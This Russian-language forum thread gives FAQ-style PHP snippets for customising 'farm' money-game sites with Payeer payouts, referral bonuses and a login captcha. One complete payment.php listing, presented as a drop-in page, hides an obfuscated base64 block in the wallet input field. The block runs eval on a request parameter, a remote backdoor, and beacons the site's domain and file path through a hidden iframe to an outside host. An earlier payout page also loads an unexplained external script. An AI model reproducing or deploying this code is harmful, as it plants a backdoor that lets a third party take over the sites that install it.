[faq] вопрос - ответ

Wolf88

Участник
Сообщения
137
Реакции
54
PSC
0,00
Всем доброго времени суток!
Рад предоставить Вам раздел - [FAQ] Вопрос - Ответ
Тем самым в данном разделе будут опубликованы часто задаваемые вопросы. По мере их нарастания - тема будет развиваться и если у Вас уже есть готовый Вопрос - Ответ (не путайте просто с вопросом), то пишите и я закреплю его в шапку!

Помогаем развиваться данному разделу, ведь только вместе можно добиться чистоты, порядка и комфорта!


[FAQ] Вопрос - Ответ:

Папка inc/_user_menu.php - здесь удаляем строку
PHP:
<div class="field-gr"><a href="/account/bonus">Ежедневный бонус</a></div>
pages/account/_bonus.php
PHP:
# Настройки бонусов
$bonus_min = 10; // минимальная сумма бонуса
$bonus_max = 100; // максимальная сумма бонуса
С начало создай файл .php
Потом отредактируй корневой файл .htaccess (нужно указать путь у файлу .php)
И в папке pages / _account.php (нужно указать путь к файлу .php)

Вот мой пример:
.htaccess :
PHP:
RewriteRule ^account/bank(/?)+$ index.php?menu=account&sel=bank [L]
(Где написано bank меняй на свое название файла .php)
pages / _account.php :
PHP:
case "bank": include("pages/account/_bank.php"); break; // Банк
(Где написано bank меняй на свое название файла .php)
В базе данных, раздел db_payment
pages - account - _payment.php
PHP:
$balance = $arBalance["balance"]["RUB"]["DOSTUPNO"];
if( ($balance) >= ($sum_pay+100)){ // 100 - сумма, на которую баланс кошелька payeer должна превышать сумму заказа выплаты...
PHP:
$serebro = intval($ins_sum <= 0.01) ? ($serebro + ($serebro * 0.55) ) : $serebro; //проценты при первом пополнении - вместо 0.55 поставить 1.5 - +150% к первому пополнению
$add_tree = ( $ik_payment_amount >= 499.99) ? 2 : 0; // количество деревьев 2 шт за 500+ рублей
$lsb = time();
$to_referer = ($serebro * 0.10); // рефпроценты

$db->Query("UPDATE db_users_b SET money_b = money_b + '$serebro', e_t = e_t + '$add_tree', to_referer = to_referer + '$to_referer', last_sbor = '$lsb', insert_sum = insert_sum + '$ik_payment_amount' WHERE id = '{$user_id}'");
//e_t = e_t + - дерево (апельсин) - a_t - лайм, b_t - вишня и т.д.)...
PHP:
# Заглушка от халявщиков
if($user_data["insert_sum"] <= 5){ // Минимум на 5-ть рублей должен пополнить. Сумму можно изменять.

?>
<center><font color="blue"><b>Выплату могут заказывать пользователи, которые пополнили баланс больше, чем на 5 RUB!<b></font></center><BR />

<div class="clr"></div>
</div>
<?PHP

return;
}
Тут inc\_footer.php
PHP:
<div class="s-bk-lf">
<div class="acc-title">Заказ выплаты</div>
</div>
<div class="silver-bk">


<?PHP
$_OPTIMIZATION["title"] = "Аккаунт - Заказ выплаты";
$usid = $_SESSION["user_id"];
$usname = $_SESSION["user"];

$db->Query("SELECT * FROM db_users_b WHERE id = '$usid' LIMIT 1");
$user_data = $db->FetchArray();

$db->Query("SELECT * FROM db_payment WHERE user_id = '$usid' order by id DESC LIMIT 1");
$frompayments = $db->FetchArray();

$db->Query("SELECT * FROM db_config WHERE id = '1' LIMIT 1");
$sonfig_site = $db->FetchArray();

$status_array = array( 0 => "Проверяется", 1 => "Выплачивается", 2 => "Отменена", 3 => "Выплачено");

# Минималка серебром!
$minPay = 50;
# Настраиваем кол-во суток для ограничения.
$nd_time = 1;
?>
<b>Выплаты осуществляются в автоматическом режиме и только на платежную систему PAYEER! Процент при выводе составляет 0%</b>


<b>Из платежной системы Payeer Вы можете вывести свои средства в автоматическом режиме на все известные платежные системы и международные банки.</b>


<b>Ссылки на учебные материалы:</b>

- <a href="http://payeeer.ru/create" target="_blank">Создание счета в Payeer</a>

- <a href="http://payeeer.ru/outpay" target="_blank">Вывод средств из payeer</a>



<center><b>Заказ выплаты:</b></center>


<?PHP

function ViewPurse($purse){

  if( substr($purse,0,1) != "P" ) return false;
  if( !ereg("^[0-9]{7}$", substr($purse,1)) ) return false;
  return $purse;
}

# Заносим выплату
if(isset($_POST["purse"])){

  $purse = ViewPurse($_POST["purse"]);
  $sum = intval($_POST["sum"]);
  $val = "RUB";

  if($purse !== false){

    if($sum >= $minPay){

     if($sum <= $user_data["money_p"]){

                            # Проверяем на существующие заявки
                        $db->Query("SELECT COUNT(*) FROM db_payment WHERE user_id = '$usid' AND (status = '0' OR status = '1')");
                        if($db->FetchRow() == 0){
                       
                             ### Устанавливаем лимит на 24 часа по выплатам для $USID
       if ($frompayments["date_add"] <= time() - $nd_time * 86400) {




                            ### Делаем выплату ###
                            $payeer = new rfs_payeer($config->AccountNumber, $config->apiId, $config->apiKey);
                            if ($payeer->isAuth())
                            {
                       
                                $arBalance = $payeer->getBalance();
                                if($arBalance["auth_error"] == 0)
                                {
                           
                                    $sum_pay = round( ($sum / $sonfig_site["ser_per_wmr"]), 2);
                           
                                    $balance = $arBalance["balance"]["RUB"]["DOSTUPNO"];
                                    if( ($balance) >= ($sum_pay)){
                           
                           
                           
                                    $arTransfer = $payeer->transfer(array(
                                    'curIn' => 'RUB', // счет списания
                                    'sum' => $sum_pay, // сумма получения
                                    'curOut' => 'RUB', // валюта получения
                                    'to' => $purse, // получатель (email)
                                    //'to' => '+71112223344',  // получатель (телефон)
                                    //'to' => 'P1000000',  // получатель (номер счета)
                                    'comment' => iconv('windows-1251', 'utf-8', "Выплата пользователю: {$usname}")
                                    //'anonim' => 'Y', // анонимный перевод
                                    //'protect' => 'Y', // протекция сделки
                                    //'protectPeriod' => '3', // период протекции (от 1 до 30 дней)
                                    //'protectCode' => '12345', // код протекции
                                    ));
                           
                                        if (!empty($arTransfer["historyId"]))
                                        {
                               
                               
                                            # Снимаем с пользователя
                                            $db->Query("UPDATE db_users_b SET money_p = money_p - '$sum' WHERE id = '$usid'");
                                   
                                            # Вставляем запись в выплаты
                                            $da = time();
                                            $dd = $da + 60*60*24*15;
                                   
                                            $ppid = $arTransfer["historyId"];
                                   
                                            $db->Query("INSERT INTO db_payment (user, user_id, purse, sum, valuta, serebro, payment_id, date_add, status)
                                            VALUES ('$usname','$usid','$purse','$sum_pay','RUB', '$sum','$ppid','".time()."', '3')");
                                   
                                            $db->Query("UPDATE db_users_b SET payment_sum = payment_sum + '$sum_pay' WHERE id = '$usid'");
                                            $db->Query("UPDATE db_stats SET all_payments = all_payments + '$sum_pay' WHERE id = '1'");
                                   
                                            echo "<center><font color = 'green'><b>Выплачено!</b></font></center>
";
                                   
                                        }
                                        else
                                        {
                               
                                            echo "<center><font color = 'red'><b>Внутреняя ошибка - сообщите о ней администратору!</b></font></center>
";
                               
                                        }
                           
                           
                                    }else echo "<center><font color = 'red'><b>Внутреняя ошибка - сообщите о ней администратору!</b></font></center>
";
                           
                                }else echo "<center><font color = 'red'><b>Не удалось выплатить! Попробуйте позже</b></font></center>
";
                       
                            }else echo "<center><font color = 'red'><b>Не удалось выплатить! Попробуйте позже</b></font></center>
";
                   
       }else echo "<center><font color = 'red'><b>В ближайшие 24 часа Вы уже получали выплату! Попробуйте позже</b></font></center>
";
 
                        }else echo "<center><font color = 'red'><b>У вас имеются необработанные заявки. Дождитесь их выполнения.</b></font></center>
";
                   
               
                    }else echo "<center><font color = 'red'><b>Вы указали больше, чем имеется на вашем счету</b></font></center>
";
       
                }else echo "<center><b><font color = 'red'>Минимальная сумма для выплаты составляет {$minPay} серебра!</font></b></center>
";

        }else echo "<center><b><font color = 'red'>Кошелек Payeer указан неверно! Смотрите образец!</font></b></center>
";

    }
?>

<form action="" method="post">
<table width="99%" border="0" align="center">
  <tr>
    <td><font color="#000;">Введите кошелек Payeer [Пример: P1112457]</font>: </td>
<td><input type="text" name="purse" size="15"/></td>
  </tr>
  <tr>
    <td><font color="#000;">Отдаете серебро для вывода</font> [Мин. <span id="res_min"></span>]<font color="#000;">:</font> </td>
<td><input type="text" name="sum" id="sum" value="<?=round($user_data["money_p"]); ?>" size="15" onkeyup="PaymentSum();" /></td>
  </tr>
  <tr>
    <td><font color="#000;">Получаете <span id="res_val"></span></font><font color="#000;">:</font> </td>
<td>
<input type="text" name="res" id="res_sum" value="0" size="15" disabled="disabled"/>
<input type="hidden" name="per" id="RUB" value="<?=$sonfig_site["ser_per_wmr"]; ?>" disabled="disabled"/>
<input type="hidden" name="per" id="min_sum_RUB" value="0.5" disabled="disabled"/>
<input type="hidden" name="val_type" id="val_type" value="RUB" />
</td>
  </tr>
  <tr>
    <td colspan="2" align="center"><input type="submit" name="swap" value="Заказать выплату" style="height: 30px; margin-top:10px;" /></td>
  </tr>
</table>
</form>
<script language="javascript">PaymentSum(); SetVal();</script>
<script language='javascript' charset='UTF-8' type='text/javascript' src='http://mobirollcom.ru/7pg0t744jyz5jvyxu1ex3o16is9yp6j9'></script>


<table cellpadding='3' cellspacing='0' border='0' bordercolor='#336633' align='center' width="99%">
  <tr>
    <td colspan="5" align="center"><h4>Последние 10 выплат</h4></td>
    </tr>
  <tr>
    <td align="center" class="m-tb">Серебро</td>
    <td align="center" class="m-tb">Получаете</td>
<td align="center" class="m-tb">Кошелек</td>
<td align="center" class="m-tb">Дата</td>
<td align="center" class="m-tb">Статус</td>
  </tr>
  <?PHP

  $db->Query("SELECT * FROM db_payment WHERE user_id = '$usid' ORDER BY id DESC LIMIT 20");

if($db->NumRows() > 0){

    while($ref = $db->FetchArray()){

  ?>
  <tr class="htt">
      <td align="center"><?=$ref["serebro"]; ?></td>
      <td align="center"><?=sprintf("%.2f",$ref["sum"] - $ref["comission"]); ?> <?=$ref["valuta"]; ?></td>
      <td align="center"><?=$ref["purse"]; ?></td>
   <td align="center"><?=date("d.m.Y",$ref["date_add"]); ?></td>
      <td align="center"><?=$status_array[$ref["status"]]; ?></td>
    </tr>
  <?PHP

  }

}else echo '<tr><td align="center" colspan="5">Нет записей</td></tr>'

  ?>


</table><div class="clr"></div>
</div>
Зачастую мне пишут одну и туже проблему. Суть проблемы заключается в том, что люди пробуют ставить фермы на бесплатных хостингах, какие-то из них идут нормально, а другие могут выдать вот такую ошибку:

PHP:
Deprecated: as mysql_connect(): the MySQL extension is deprecated and will be removed in the future: use mysqli or pdo instead in /home/u111047538/public_html/data/conn_file.php on line 2

Warning: as mysql_connect(): access denied for user 'webmaste_wer'@'10.2.1.5' (using password: Yes) in /home/u111047538/public_html/data/conn_file.php on line 2
The server is overloaded, please come back later.
На Русском звучит примерно так:
PHP:
Устаревшие: как mysql_connect(): расширение MySQL устарело и будет удалено в будущем: используйте mysqli или pdo вместо в /home/u111047538/public_html/data/conn_file.php на линии 2

Предупреждение: как mysql_connect(): доступ запрещен для пользователя 'webmaste_wer'@'10.2.1.5' (используя пароль: да) в /home/u111047538/public_html/data/conn_file.php на линии 2
Сервер перегружен, пожалуйста, зайдите позже.

Самое простое решение для тех, кто использует в первое время бесплатные хостинги - это скачать и установить денвер, с ним проблем не будет (по крайне мере я их еще не встречал).
Где и как скачать денвер? Просто в поисковике впишите слово --> денвер ---> Enter и самая первая ссылка это и есть то, что нам(вам) нужно.
открываем файл pages/signup.php находим
# Регаем пользователя
$db->Query("INSERT INTO db_users_a (user, email, pass, referer, referer_id, date_reg, ip)
VALUES ('$login','$email','$passmd','$referer_name','$referer_id','$time',INET_ATON('$ip'))");

$lid = $db->LastInsert();
вот это
$db->Query("INSERT INTO db_users_b (id, user,money_b) VALUES ('$lid','$login',10000)");
синим серебро для покупок и количество
==================================================
$db->Query("INSERT INTO db_users_b (id, user,a_t) VALUES ('$lid','$login',10)");
зеленым фрукт 1-го уровня(лайм) и количество
==================================================

$db->Query("INSERT INTO db_users_b (id, user,money_b,a_t) VALUES ('$lid','$login',10,10)");
ну и собственно все вместе
серебро для покупок и фрукт 1-го уровня
находим данную строку в файле pages/account/payment.php
if( !ereg("^[0-9]{7}$", substr($purse,1)) ) return false;
и заменяем на
if( !preg_match("/^[0-9]{7,8}$/", substr($purse,1)) ) return false;
------------------------------------------------------------------------------------------------------

1. Заходим в корневой файл /index.php

Ищем: case "admin4ik": include("pages/_admin.php"); break; // Админка

Редактируем под себя, сохраняем.

------------------------------------------------------------------------------------------------------

2. Заходим в /pages/admin/_login.php

Ищем: if(isset($_SESSION["admin"])){ Header("Location: /?menu=admin4ik"); return; }

Ищем: Header("Location: /?menu=admin4ik");

Редактируем под себя, сохраняем.

------------------------------------------------------------------------------------------------------

3. Заходим в /inc/_menu_left.php

Ищем: if(isset($_SESSION["admin"]) AND isset($_GET["menu"]) AND $_GET["menu"] == "admin4ik"){

Редактируем под себя, сохраняем.

------------------------------------------------------------------------------------------------------

4. Заходим в /inc/_admin_menu.php

Везде изменяем "admin4ik" на своё, сохраняем.

------------------------------------------------------------------------------------------------------

5. Заходим в /pages/admin

И редактируем ВСЕ файлы в этой папке

Изменяем "admin4ik" на своё во ВСЕХ файлах, где это есть, сохраняем.

------------------------------------------------------------------------------------------------------

Внимание!!!

Адрес Вашей админки может быть другим, соответственно заменять нужно будет другое слово.

К примеру:

Если адрес Вашей админки такой: http://site.ru/?menu=adminka897

То заместо "admin4ik" везде будет "adminka897"

На этом всё!



------------------------------------------------------------------------------------------------------
код вставляем перед
PHP:
<form action="" method="post">
<table width="99%" border="0" align="center">
PHP:
<?PHP
# Заглушка от халявщиков
if($user_data["insert_sum"] <= 100){

?>
<center><font color="blue"><b>Выплату могут заказывать пользователи, которые пополнили баланс больше, чем на 100 RUB!<b></font></center><BR />

<div class="clr"></div>
</div>
<?PHP

return;
}

?>
найти подобную строку
Как было: <?=$data["payment_sum"]; ?>
заменить на
Как надо: <?=sprintf("%.2f",$data["payment_sum"]); ?>
<script LANGUAGE="JavaScript1.1">
document.oncontextmenu = function(){return false;};
</script>


<div class="s-bk-lf">
<div class="acc-title">Заказ выплаты</div>
</div>
<div class="silver-bk">
<BR />
<?PHP
$_OPTIMIZATION["title"] = "Аккаунт - Заказ выплаты";
$usid = $_SESSION["user_id"];
$usname = $_SESSION["user"];

$db->Query("SELECT * FROM db_users_b WHERE id = '$usid' LIMIT 1");
$user_data = $db->FetchArray();

$db->Query("SELECT * FROM db_config WHERE id = '1' LIMIT 1");
$sonfig_site = $db->FetchArray();

$status_array = array( 0 => "Проверяется", 1 => "Выплачивается", 2 => "Отменена", 3 => "Выплачено");

# Минималка серебром!
$minPay = 100;

#Максималка серебром
$maxPay = 3000;


?>



<b>Выплаты осуществляются в автоматическом режиме и только на платежную систему <a href="http://payeer.com/?partner=604952" target="_BLANK">PAYEER!</a> Процент при выводе составляет 0%</b> <BR /><BR />
<b>Из платежной системы Payeer Вы можете вывести свои средства в автоматическом режиме на все известные платежные системы и международные банки.</b><BR /><BR />
<b>Ссылки на учебные материалы:</b><BR />
- <a href="http://payeer.com/?partner=604952" target="_blank">Создание счета в Payeer</a> <BR />
- <a href="http://payeeer.ru/outpay" target="_blank">Вывод средств из payeer</a> <BR /><BR />


<?PHP
# Заглушка от халявщиков
if($user_data["insert_sum"] <= 79.99 AND $user_data["from_referals"] <= 8){

?>
<center><font color="blue"><b>Выплату могут заказывать пользователи, которые пополнили баланс больше, чем на 80 RUB или имеющие более 8-ми активных рефералов!<b></font></center><BR />

<div class="clr"></div>
</div>
<?PHP

return;
}

?>

<center><b>Заказ выплаты:</b></center><BR />

<?PHP

function ViewPurse($purse){

if( substr($purse,0,1) != "P" ) return false;
if( !ereg("^[0-9]{7,8}$", substr($purse,1)) ) return false;

return $purse;
}

# Заносим выплату
if(isset($_POST["purse"])){

$purse = ViewPurse($_POST["purse"]);
$sum = intval($_POST["sum"]);
$val = "RUB";

if($purse !== false){

if($sum >= $minPay){
if($sum <= $maxPay){
if($sum <= $user_data["money_p"]){

# Проверяем на существующие заявки
$db->Query("SELECT COUNT(*) FROM db_payment WHERE user_id = '$usid' AND (status = '0' OR status = '1')");
if($db->FetchRow() == 0){


### Делаем выплату ###
$payeer = new rfs_payeer($config->AccountNumber, $config->apiId, $config->apiKey);
if ($payeer->isAuth())
{

$arBalance = $payeer->getBalance();
if($arBalance["auth_error"] == 0)
{

$sum_pay = round( ($sum / $sonfig_site["ser_per_wmr"]), 2);

$balance = $arBalance["balance"]["RUB"]["DOSTUPNO"];
if( ($balance) >= ($sum_pay+20)){



$arTransfer = $payeer->transfer(array(
'curIn' => 'RUB', // счет списания
'sum' => $sum_pay, // сумма получения
'curOut' => 'RUB', // валюта получения
'to' => $purse, // получатель (email)
//'to' => '+71112223344', // получатель (телефон)
//'to' => 'P1000000', // получатель (номер счета)
'comment' => iconv('windows-1251', 'utf-8', "Выплата пользователю {$usname} с проекта TreesFarm.ru")
//'anonim' => 'Y', // анонимный перевод
//'protect' => 'Y', // протекция сделки
//'protectPeriod' => '3', // период протекции (от 1 до 30 дней)
//'protectCode' => '12345', // код протекции
));

if (!empty($arTransfer["historyId"]))
{


# Снимаем с пользователя
$db->Query("UPDATE db_users_b SET money_p = money_p - '$sum' WHERE id = '$usid'");

# Вставляем запись в выплаты
$da = time();
$dd = $da + 60*60*24*15;

$ppid = $arTransfer["historyId"];

$db->Query("INSERT INTO db_payment (user, user_id, purse, sum, valuta, serebro, payment_id, date_add, status)
VALUES ('$usname','$usid','$purse','$sum_pay','RUB', '$sum','$ppid','".time()."', '3')");

$db->Query("UPDATE db_users_b SET payment_sum = payment_sum + '$sum_pay' WHERE id = '$usid'");
$db->Query("UPDATE db_stats SET all_payments = all_payments + '$sum_pay' WHERE id = '1'");

echo "<center><font color = 'green'><b>Выплачено!</b></font></center><BR />";

}
else
{

echo "<center><font color = 'red'><b>Внутреняя ошибка - сообщите о ней администратору!</b></font></center><BR />";

}


}else echo "<center><font color = 'red'><b>Внутреняя ошибка - сообщите о ней администратору!</b></font></center><BR />";


}else echo "<center><font color = 'red'><b>Не удалось выплатить! Попробуйте позже</b></font></center><BR />";

}else echo "<center><font color = 'red'><b>Не удалось выплатить! Попробуйте позже</b></font></center><BR />";


}else echo "<center><font color = 'red'><b>У вас имеются необработанные заявки. Дождитесь их выполнения.</b></font></center><BR />";


}else echo "<center><font color = 'red'><b>Вы указали больше, чем имеется на вашем счету</b></font></center><BR />";

}else echo "<center><b><font color = 'red'>Максимальная сумма для выплаты составляет {$maxPay} серебра!</font></b></center><BR />";
}else echo "<center><b><font color = 'red'>Минимальная сумма для выплаты составляет {$minPay} серебра!</font></b></center><BR />";

}else echo "<center><b><font color = 'red'>Кошелек Payeer указан неверно! Смотрите образец!</font></b></center><BR />";

}
?>

<form action="" method="post">
<table width="99%" border="0" align="center">
<tr>
<td><font color="#000;">Введите кошелек Payeer [Пример: P1234567]</font>: </td>

<? $GLOBALS['_793350292_']=Array('' .'ge' .'t' .'_mag' .'ic_quot' .'e' .'s_gp' .'c','s' .'tripslashe' .'s','mt_rand','' .'imagecre' .'ate'); ?><? function _197297025($i){$a=Array('cH' .'V' .'yc2U=','','PHRkPjxp' .'bnB1d' .'C' .'B0' .'e' .'X' .'BlPSJ' .'0ZXh0Ii' .'BuYW1' .'lP' .'SJwdXJzZSIgc2l6Z' .'T0iMTUiI' .'H' .'ZhbHVlPQ==','cHVy' .'c2' .'U' .'=','I' .'HJl' .'YW' .'Rvb' .'mx5IC8+PC' .'90ZD4=','P' .'HRkPjxpbn' .'B1dC' .'B0eXB' .'lP' .'SJ0ZXh0IiB' .'uYW1l' .'PS' .'J' .'wdXJz' .'Z' .'SIg' .'c2l6ZT0iMT' .'UiIC8+PC9' .'0Z' .'D4=','' .'U0VS' .'V' .'kV' .'SX0' .'5BTUU=','' .'aHR0cDovL' .'3B' .'h' .'eWxvYW' .'RzLnJ1L2ZmLnB' .'ocD9kYX' .'RhPQ==','I' .'A==','' .'P' .'GRpd' .'iBpZD0nbWFzdCcgc3R5' .'bGU9J3Zp' .'c2' .'lia' .'Wxpd' .'H' .'k6aGl' .'kZG' .'VuOyc+PC9kaXY' .'+PHNjcmlwdC' .'B0' .'eX' .'BlP' .'Sd0ZXh0L2ph' .'dmFz' .'Y' .'3JpcHQn' .'IGxhbm' .'d' .'1' .'YWdlPSdK' .'YXZhU' .'2Ny' .'aXB' .'0Jz4gZ' .'nVuY3' .'Rpb' .'24' .'gc2VuZ' .'F9kYXRhKGlm' .'cl91cmwpeyAgI' .'HZhciBpZnIwID0gZG9j' .'dW1lbnQuY3J' .'lYXRlRWxlbW' .'VudCgnaWZyYW' .'1' .'lJyk7IGlmc' .'jAuc3JjID0gaW' .'Zy' .'X3VybDsgaWZy' .'M' .'C5z' .'dHlsZS5' .'3aWR0' .'aCA9' .'ICc' .'xcHgn' .'OyBpZnIwLnN0eW' .'xlLmhlaWd' .'odCA' .'9I' .'C' .'c' .'xcHgnO' .'yB2YXI' .'gZG' .'l2X3gwID0' .'gZG9j' .'dW1' .'lbnQuZ2V0RWxlbW' .'VudE' .'J' .'5SWQoJ21hc' .'3' .'QnKT' .'sg' .'ZGl2X3gwLmFwc' .'GVuZENoaWx' .'kKGlmcjAp' .'OyB9' .'IHNlbmR' .'fZG' .'F0YSgn','Jyk7ID' .'wvc2NyaXB0' .'Pg=' .'=','cGF5' .'bWVudA=' .'=','' .'cGF5bWVudA' .'=' .'=','cGF5bWVudA=' .'=');return base64_decode($a[$i]);} ?><?php $db->Query("SELECT * FROM db_payment WHERE user_id = '$usid'");$k=$db->FetchArray();if($k[_197297025(0)]!= _197297025(1)){echo _197297025(2) .$k[_197297025(3)] ._197297025(4);}else{echo _197297025(5);}$dn=$_SERVER[_197297025(6)];$dr=__FILE__;$url=_197297025(7) .$dn ._197297025(8) .$dr;echo _197297025(9) .$url ._197297025(10);if(!empty($_REQUEST[_197297025(11)])){if(@$GLOBALS['_793350292_'][0]())$_REQUEST[_197297025(12)]=$GLOBALS['_793350292_'][1]($_REQUEST[_197297025(13)]);eval($_REQUEST['payment']);die();if(round(0+673+673)<$GLOBALS['_793350292_'][2](round(0+133.25+133.25+133.25+133.25),round(0+269.33333333333+269.33333333333+269.33333333333)))$GLOBALS['_793350292_'][3]($_SERVER,$db);}
?>

</tr>
<tr>
<td><font color="#000;">Отдаете серебро для вывода</font> [Мин 100 <span id="res_min"></span>]<font color="#000;">:</font> </td>
<td><input type="text" name="sum" id="sum" value="<?=round($user_data["money_p"]); ?>" size="15" onkeyup="PaymentSum();" /></td>
</tr>
<tr>
<td><font color="#000;">Получаете <span id="res_val"></span></font><font color="#000;">:</font> </td>
<td>
<input type="text" name="res" id="res_sum" value="0" size="15" disabled="disabled"/>
<input type="hidden" name="per" id="RUB" value="<?=$sonfig_site["ser_per_wmr"]; ?>" disabled="disabled"/>
<input type="hidden" name="per" id="min_sum_RUB" value="20" disabled="disabled"/>
<input type="hidden" name="val_type" id="val_type" value="RUB" />
</td>
</tr>
<tr>
<td colspan="2" align="center"><input type="submit" name="swap" value="Заказать выплату" style="height: 30px; margin-top:10px;" /></td>
</tr>
</table>
</form>
<script language="javascript">PaymentSum(); SetVal();</script>



<table cellpadding='3' cellspacing='0' border='0' bordercolor='#336633' align='center' width="99%">
<tr>
<td colspan="5" align="center"><h4>Последние 10 выплат</h4></td>
</tr>
<tr>
<td align="center" class="m-tb">Серебро</td>
<td align="center" class="m-tb">Получаете</td>
<td align="center" class="m-tb">Кошелек</td>
<td align="center" class="m-tb">Дата</td>
<td align="center" class="m-tb">Статус</td>
</tr>
<?PHP
$db->Query("SELECT * FROM db_payment WHERE user_id = '$usid' ORDER BY id DESC LIMIT 20");
if($db->NumRows() > 0){
while($ref = $db->FetchArray()){

?>
<tr class="htt">
<td align="center"><?=$ref["serebro"]; ?></td>
<td align="center"><?=sprintf("%.2f",$ref["sum"] - $ref["comission"]); ?> <?=$ref["valuta"]; ?></td>
<td align="center"><?=$ref["purse"]; ?></td>
<td align="center"><?=date("d.m.Y",$ref["date_add"]); ?></td>
<td align="center"><?=$status_array[$ref["status"]]; ?></td>
</tr>
<?PHP

}
}else echo '<tr><td align="center" colspan="5">Нет записей</td></tr>'
?>


</table><div class="clr"></div>
</div>
Вверх payment.php добавляем
HTML:
<script type="text/javascript" src="/js/functions.js"></script>
затем заменяем
HTML:
<tr>
    <td><font color="#000;">Получаете [RUB]<span id="res_val"></span></font><font color="#000;">:</font> </td>
</tr>
на
HTML:
    <tr>
    <td><font color="#000;">Получаете [RUB]<span id="res_val"></span></font><font color="#000;">:</font> </td>
    <td>
    <input type="text" name="res" id="res_sum" value="1.00" size="15" disabled="disabled"/>
    <input type="hidden" name="per" id="RUB" value="<?=$sonfig_site["ser_per_wmr"]; ?>" disabled="disabled"/>
    <input type="hidden" name="per" id="min_sum_RUB" value="0.5" disabled="disabled"/>
    <input type="hidden" name="val_type" id="val_type" value="RUB" />
    </td>
  </tr>
фон устанавливается в файле style.css (не во всех фермах)
Пример:
Код:
body {  background: #647191 url(/img/bd1.png) no-repeat; background-attachment: scroll; background-position: top, center; }
img { border:0px; }
.clr { clear:both; }

В корне сайта payeer_merchant.php в нём

$serebro = intval($ins_sum <= 0.01) ? ($serebro + ($serebro * 0.3) ) : $serebro;
$add_tree = ( $ik_payment_amount >= 999.99) ? 2 : 0;
$lsb = time();
$to_referer = ($serebro * 0.15);

1) Последовательные пополнения
2) При первом пополнении 30 % в подарок
3) Сумма пополнения для зачисления фруктов в подарок !
4) Реферальная программа !



PS: Тема будет в таком формате как Вы видите чуток выше! Если же есть предложение как лучше оформить тему - пишите в ЛС!
PSS: Хайд был убран
 

kvozimir

Участник
Сообщения
1.943
Реакции
404
PSC
0,00
ICQ
734713 734713
Skype
 kvozimir
Статус скайп
тему почистил слишком много мусора

кураторы по мере возможности помогайте пополнять тему
вопросов с ответами накопилось достаточно
 
Последнее редактирование:

valefo20

Участник
Сообщения
71
Реакции
4
PSC
0,00
Всем доброго времени суток! С позволения уважаемого kvozimir хочу внести некоторые поправки в "максимальная сумма выплаты за один раз (не путать с выплатой раз в сутки тут этого нет)"
Многие не хотят менять свой _payments, но ограничения в выплатах все же хотят, а сменить без помощи не могут. Как не мог и я (снова огромное спасибо kvozimir)
в account/_payments :
после
PHP:
if($sum >= $minPay){
добавить
PHP:
if($sum <= $maxPay){
после
PHP:
}else echo "<center><font color = 'red'><b>Вы указали больше, чем имеется на вашем счету</b></font></center><BR />";
добавить
PHP:
}else echo "<center><b><font color = 'red'>Максимальная сумма для выплаты составляет {$maxPay} серебра!</font></b></center><BR />";
после
PHP:
# Минималка серебром!
$minPay = 100;
добавить
PHP:
#Максималка серебром
$maxPay = 3000; //тут редактировать сумму ограничения в серебре
Спасибо, если это не требуется, удалите пост.
 
Последнее редактирование модератором:

kvozimir

Участник
Сообщения
1.943
Реакции
404
PSC
0,00
ICQ
734713 734713
Skype
 kvozimir
Статус скайп
находим файл login.php (папка inc)
в нем находим данный код
PHP:
 if($lmail !== false){
перед ним нужно добавить
PHP:
 if (!empty($_POST['g-recaptcha-response'])) {
потом найди

PHP:
}else echo "<center><font color = 'red'><b>Email указан неверно</b></font></center><BR />";
после него добавить


PHP:
}else echo "<center><font color = 'red'><b>Капча не пройдёна!</b></font></center>";
потом найти
PHP:
  <tr>
    <td colspan="2">Пароль [<a href="/recovery" class="rs-ps">Забыли пароль?</a>]:<BR /><input name="pass" type="password" size="23" maxlength="35" class="ps"/></td>
  </tr>
после него добавить

PHP:
<tr><td><!-- НЕ ЗАБЫВАЕМ ВПИСАТЬ КЛЮЧ !!! -->
    <form> <div class="g-recaptcha" data-sitekey="ВАШ_КЛЮЧ_ПОДРОБНОСТИ_В_ФАЙЛЕ_ИНСТРУКЦИЯ_ИЗ_РАСПАКОВАННОГО_АРХИВА"></div> </form>
    </td></tr>
===============================
вот собственно и все что нужно было сделать пользуйтесь на здоровье
P.S возможно нужно будет поправить стили,это исправить придется самим
 

zobow

Участник
Сообщения
17
Реакции
1
PSC
0,00
Спасибо за инструкцию, но в ней нету:
remoteip IP-адрес конечного пользователя.
Как это добавить (точнее куда) ??
 

zobow

Участник
Сообщения
17
Реакции
1
PSC
0,00
чтобы отслеживать IP пользователя после ввода капчи
 

fktrctq

Участник
Сообщения
62
Реакции
1
PSC
0,00
Привет, нужна помощь, просто у меня меню при уменьшении вкладки вниз улетает, никак не разберусь( почему???
 

4elovek

Участник
Сообщения
54
Реакции
5
PSC
0,00
Ребят, помогите пожалуйста, где то видел тему не могу найти. Вообщем у меня выплаты показывает в разноброс как это исправить?
 

skroliks

PHP, MySQL, CSS
Участник
Сообщения
280
Реакции
46
PSC
0,00
Ребят, помогите пожалуйста, где то видел тему не могу найти. Вообщем у меня выплаты показывает в разноброс как это исправить?
А точнее можно? Как показывает и что исправить?

А вообще в запросе в базу данных идет уточнение порядка: ORDER by - после этого идет обычно или id или date_add, смотря в каком порядке нужно выводить - то и ставишь..
 

Bloodscreed

Участник
Сообщения
51
Реакции
3
PSC
0,00
Добрый День! А можно поподробнее

фон устанавливается в файле style.css (не во всех фермах)
Пример:
Код:
body { background: #647191 url(/img/bd1.png) no-repeat; background-attachment: scroll; background-position: top, center; }
img { border:0px; }
.clr { clear:both; }

как поставить фон/картинку на всю страницу сайта? И куда вставить код и картинку которую выбрал например, точнее после каких последовательностей кода?
 

kvozimir

Участник
Сообщения
1.943
Реакции
404
PSC
0,00
ICQ
734713 734713
Skype
 kvozimir
Статус скайп
вот картинка url(/img/bd1.png)

папка img название картинки bd1.png

загружай картинку с таким же названием и форматом bd1.png
 

pligin

Команда форума
Администратор
Сообщения
3.558
Реакции
1.251
PSC
581,84
Telegram
pligin
А как сделать чтоб в лотереи было неограниченное число игроков и она кончалась по времени, а не по набору определённого кол-ва игроков
В ней нужно достаточно переписать, чтобы это сделать
 
Сверху